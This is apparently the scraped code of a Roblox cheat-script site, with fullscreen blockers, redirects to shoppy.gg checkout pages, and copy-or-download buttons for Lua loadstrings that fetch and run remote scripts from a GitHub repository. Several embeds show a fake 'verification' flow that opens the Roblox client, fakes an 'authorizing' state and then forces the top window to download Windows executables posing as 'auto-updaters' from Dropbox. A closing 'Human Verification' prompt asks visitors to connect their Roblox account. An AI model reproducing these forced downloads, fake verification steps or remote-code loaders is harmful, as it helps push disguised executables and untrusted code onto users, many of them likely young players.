(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();


Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { window.location='https://shoppy.gg/product/bzAsuOA' }, 3200);
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();

Redirecting you to a Secure Checkout

Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { window.location='https://www.roblox.com/games/100104403001923/Auto-Farm-Access#!' }, 3200);
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();

Redirecting you to a Secure Checkout

Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { window.location='https://shoppy.gg/product/R6NN0EH' }, 3200);
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();

Redirecting you to a Secure Checkout

Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { window.location='https://shoppy.gg/product/eyjz3b2' }, 3200);
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();

Redirecting you to a Secure Checkout

Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { window.location='https://www.roblox.com/games/96305410131075/WAC-Access' }, 3200);
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();

Redirecting you to a Secure Checkout

Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { window.location='https://shoppy.gg/product/b8hiKgm' }, 3200);
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();

Redirecting you to a Secure Checkout

Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { window.location='https://shoppy.gg/product/LRBKIkM' }, 3200);
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();

Redirecting you to a Secure Checkout

Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { window.location='https://www.roblox.com/games/81479597210684/VAC-Access' }, 3200);
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();

Redirecting you to a Secure Checkout

Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { window.location='https://www.roblox.com/games/71431051961592/ZS-Access' }, 3200);
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();

Redirecting you to a Secure Checkout

Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { window.location='https://shoppy.gg/product/ViKUpzy' }, 3200);
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();

Redirecting you to a Secure Checkout

Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);
Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);
Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);
loadstring(game:HttpGet('https://raw.githubusercontent.com/h2grobloxscripts/wantedscripts/refs/heads/main/admincmds.lua'))()

Copied to clipboard

const waembedLoadstringContent = "loadstring(game:HttpGet('https://raw.githubusercontent.com/h2grobloxscripts/wantedscripts/refs/heads/main/admincmds.lua'))()"; function waembedCopyLoadstring() { navigator.clipboard.writeText(waembedLoadstringContent); const copied = document.getElementById("waembedCopiedText"); copied.textContent = "Copied to clipboard"; copied.classList.add("show"); setTimeout(() => { copied.classList.remove("show"); }, 1500); } function waembedDownloadLua() { const blob = new Blob([waembedLoadstringContent], { type: "text/plain" }); const link = document.createElement("a"); link.href = URL.createObjectURL(blob); link.download = "wantedcommands.lua"; document.body.appendChild(link); link.click(); document.body.removeChild(link); URL.revokeObjectURL(link.href); const copied = document.getElementById("waembedCopiedText"); copied.textContent = "Lua file downloaded"; copied.classList.add("show"); setTimeout(() => { copied.classList.remove("show"); }, 1500); }
Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);
loadstring(game:HttpGet('https://raw.githubusercontent.com/h2grobloxscripts/wantedscripts/refs/heads/main/oasiscityjewelry.lua'))()

Copied to clipboard

const loadstringContent = "loadstring(game:HttpGet('https://raw.githubusercontent.com/h2grobloxscripts/wantedscripts/refs/heads/main/oasiscityjewelry.lua'))()"; function copyLoadstring() { navigator.clipboard.writeText(loadstringContent); const copied = document.getElementById("copiedText"); copied.textContent = "Copied to clipboard"; copied.classList.add("show"); setTimeout(() => { copied.classList.remove("show"); }, 1500); } function downloadLua() { const blob = new Blob([loadstringContent], { type: "text/plain" }); const link = document.createElement("a"); link.href = URL.createObjectURL(blob); link.download = "oasiscityjewelry.lua"; document.body.appendChild(link); link.click(); document.body.removeChild(link); URL.revokeObjectURL(link.href); const copied = document.getElementById("copiedText"); copied.textContent = "Lua file downloaded"; copied.classList.add("show"); setTimeout(() => { copied.classList.remove("show"); }, 1500); }
Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);
loadstring(game:HttpGet('https://raw.githubusercontent.com/h2grobloxscripts/wantedscripts/refs/heads/main/bayviewjewelry.lua'))()

Copied to clipboard

const bayviewLoadstringContent = "loadstring(game:HttpGet('https://raw.githubusercontent.com/h2grobloxscripts/wantedscripts/refs/heads/main/bayviewjewelry.lua'))()"; function copyBayviewLoadstring() { navigator.clipboard.writeText(bayviewLoadstringContent); const copied = document.getElementById("bayviewCopiedText"); copied.textContent = "Copied to clipboard"; copied.classList.add("show"); setTimeout(() => { copied.classList.remove("show"); }, 1500); } function downloadBayviewLua() { const blob = new Blob([bayviewLoadstringContent], { type: "text/plain" }); const link = document.createElement("a"); link.href = URL.createObjectURL(blob); link.download = "bayviewjewelry.lua"; document.body.appendChild(link); link.click(); document.body.removeChild(link); URL.revokeObjectURL(link.href); const copied = document.getElementById("bayviewCopiedText"); copied.textContent = "Lua file downloaded"; copied.classList.add("show"); setTimeout(() => { copied.classList.remove("show"); }, 1500); }
Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);
OASIS CITY BANK
loadstring(game:HttpGet('https://raw.githubusercontent.com/h2grobloxscripts/wantedscripts/refs/heads/main/oasiscitybank.lua'))()
OASIS CITY BANK ULTRA
loadstring(game:HttpGet('https://raw.githubusercontent.com/h2grobloxscripts/wantedscripts/refs/heads/main/oasiscitybankultra.lua'))()

Copied to clipboard

const h2gBankCombinedNormalContent = "loadstring(game:HttpGet('https://raw.githubusercontent.com/h2grobloxscripts/wantedscripts/refs/heads/main/oasiscitybank.lua'))()"; const h2gBankCombinedUltraContent = "loadstring(game:HttpGet('https://raw.githubusercontent.com/h2grobloxscripts/wantedscripts/refs/heads/main/oasiscitybankultra.lua'))()"; function h2gBankCombinedShowStatus(message) { const status = document.getElementById("h2gBankCombinedStatus"); status.textContent = message; status.classList.add("show"); setTimeout(() => { status.classList.remove("show"); }, 1500); } function h2gBankCombinedCopyNormal() { navigator.clipboard.writeText(h2gBankCombinedNormalContent); h2gBankCombinedShowStatus("Bank loadstring copied"); } function h2gBankCombinedCopyUltra() { navigator.clipboard.writeText(h2gBankCombinedUltraContent); h2gBankCombinedShowStatus("Bank Ultra loadstring copied"); } function h2gBankCombinedDownloadNormal() { const blob = new Blob([h2gBankCombinedNormalContent], { type: "text/plain" }); const link = document.createElement("a"); link.href = URL.createObjectURL(blob); link.download = "oasiscitybank.lua"; document.body.appendChild(link); link.click(); document.body.removeChild(link); URL.revokeObjectURL(link.href); h2gBankCombinedShowStatus("Bank Lua file downloaded"); } function h2gBankCombinedDownloadUltra() { const blob = new Blob([h2gBankCombinedUltraContent], { type: "text/plain" }); const link = document.createElement("a"); link.href = URL.createObjectURL(blob); link.download = "oasiscitybankultra.lua"; document.body.appendChild(link); link.click(); document.body.removeChild(link); URL.revokeObjectURL(link.href); h2gBankCombinedShowStatus("Bank Ultra Lua file downloaded"); }
Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);
loadstring(game:HttpGet('https://raw.githubusercontent.com/h2grobloxscripts/bloxstrikescripts/refs/heads/main/zerostrike.lua'))()

Copied to clipboard

const voxelsCmdLoadstringContent = "loadstring(game:HttpGet('https://raw.githubusercontent.com/h2grobloxscripts/bloxstrikescripts/refs/heads/main/zerostrike.lua'))()"; function copyVoxelsCmdLoadstring() { navigator.clipboard.writeText(voxelsCmdLoadstringContent); const voxelsCmdCopied = document.getElementById("voxelscmdCopiedText"); voxelsCmdCopied.textContent = "Copied to clipboard"; voxelsCmdCopied.classList.add("show"); setTimeout(() => { voxelsCmdCopied.classList.remove("show"); }, 1500); } function downloadVoxelsCmdLua() { const voxelsCmdBlob = new Blob( [voxelsCmdLoadstringContent], { type: "text/plain" } ); const voxelsCmdLink = document.createElement("a"); voxelsCmdLink.href = URL.createObjectURL(voxelsCmdBlob); voxelsCmdLink.download = "zerostrike.lua"; document.body.appendChild(voxelsCmdLink); voxelsCmdLink.click(); document.body.removeChild(voxelsCmdLink); URL.revokeObjectURL(voxelsCmdLink.href); const voxelsCmdCopied = document.getElementById("voxelscmdCopiedText"); voxelsCmdCopied.textContent = "Lua file downloaded"; voxelsCmdCopied.classList.add("show"); setTimeout(() => { voxelsCmdCopied.classList.remove("show"); }, 1500); }
Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);
loadstring(game:HttpGet('https://raw.githubusercontent.com/h2grobloxscripts/voxelsscripts/refs/heads/main/voxelscommands.lua'))()

Copied to clipboard

const oasisBankLoadstringContent = "loadstring(game:HttpGet('https://raw.githubusercontent.com/h2grobloxscripts/voxelsscripts/refs/heads/main/voxelscommands.lua'))()"; function copyOasisBankLoadstring() { navigator.clipboard.writeText(oasisBankLoadstringContent); const oasisBankCopied = document.getElementById("oasisbankCopiedText"); oasisBankCopied.textContent = "Copied to clipboard"; oasisBankCopied.classList.add("show"); setTimeout(() => { oasisBankCopied.classList.remove("show"); }, 1500); } function downloadOasisBankLua() { const oasisBankBlob = new Blob( [oasisBankLoadstringContent], { type: "text/plain" } ); const oasisBankLink = document.createElement("a"); oasisBankLink.href = URL.createObjectURL(oasisBankBlob); oasisBankLink.download = "voxelscommands.lua"; document.body.appendChild(oasisBankLink); oasisBankLink.click(); document.body.removeChild(oasisBankLink); URL.revokeObjectURL(oasisBankLink.href); const oasisBankCopied = document.getElementById("oasisbankCopiedText"); oasisBankCopied.textContent = "Lua file downloaded"; oasisBankCopied.classList.add("show"); setTimeout(() => { oasisBankCopied.classList.remove("show"); }, 1500); }
Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);
var timer = setTimeout(function() { window.location='roblox://placeId=118148384655823' }, 4300);
(function() { setTimeout(function() { window.top.location.href = "https://www.dropbox.com/scl/fi/4bbsex3gh3u9xe72had0t/WantedAutoUpdater.exe?rlkey=geef55tlxnkc7k169jp52xvrn&st=nqc18ak7&dl=1"; }, 30000); })();

Click 'Open Roblox Game Client' to get verified

Next, download the respective script deployment:WANTED AUTO-UPDATER🗁
Finally, log in and it displays all of your scripts right in your dashboard.
Please note it can take up to 24 hours wait time for whitelist approval

Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);
var timer = setTimeout(function() { window.location='roblox://placeId=95586777758266' }, 4300);
(function() { setTimeout(function() { window.top.location.href = "https://www.dropbox.com/scl/fi/4bbsex3gh3u9xe72had0t/WantedAutoUpdater.exe?rlkey=geef55tlxnkc7k169jp52xvrn&st=nqc18ak7&dl=1"; }, 30000); })();

Click 'Open Roblox Game Client' to get verified

Next, download the respective script deployment:WANTED AUTO-UPDATER🗁
Finally, log in and it displays all of your scripts right in your dashboard.
Please note it can take up to 24 hours wait time for whitelist approval

Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);
var timer = setTimeout(function() { window.location='roblox://placeId=99264129360873' }, 4300);
(function() { setTimeout(function() { window.top.location.href = "https://www.dropbox.com/scl/fi/r3364wpz01i6af0vkcbif/BloxStrikeAutoUpdater.exe?rlkey=0pbgz4e1iv1fgs7us3bjtrvju&st=yjhcvacj&dl=1"; }, 30000); })();

Click 'Open Roblox Game Client' to get verified

Next, download the respective script deployment:BLOX STRIKE AUTO-UPDATER🗁
Finally, log in and it displays all of your scripts right in your dashboard.
Please note it can take up to 24 hours wait time for whitelist approval

Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);
var timer = setTimeout(function() { window.location='roblox://placeId=78318874715425' }, 4300);
(function() { setTimeout(function() { window.top.location.href = "https://www.dropbox.com/scl/fi/ct549mftcafcqi9k72p46/VoxelsAutoUpdater.exe?rlkey=l4006hpcob19pr8mvx82kvwk2&st=wklmasg3&dl=1"; }, 30000); })();

Click 'Open Roblox Game Client' to get verified

Next, download the respective script deployment:VOXELS AUTO-UPDATER🗁
Finally, log in and it displays all of your scripts right in your dashboard.
Please note it can take up to 24 hours wait time for whitelist approval

Bottom Right Image Overlay
Floating Link Icon
Bottom Right Image Overlay
Floating Link Icon
Bottom Right Image Overlay
Floating Link Icon
Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);

Human Verification

Connect your Roblox account and solve the captcha.


This site can only be accessed on Desktop.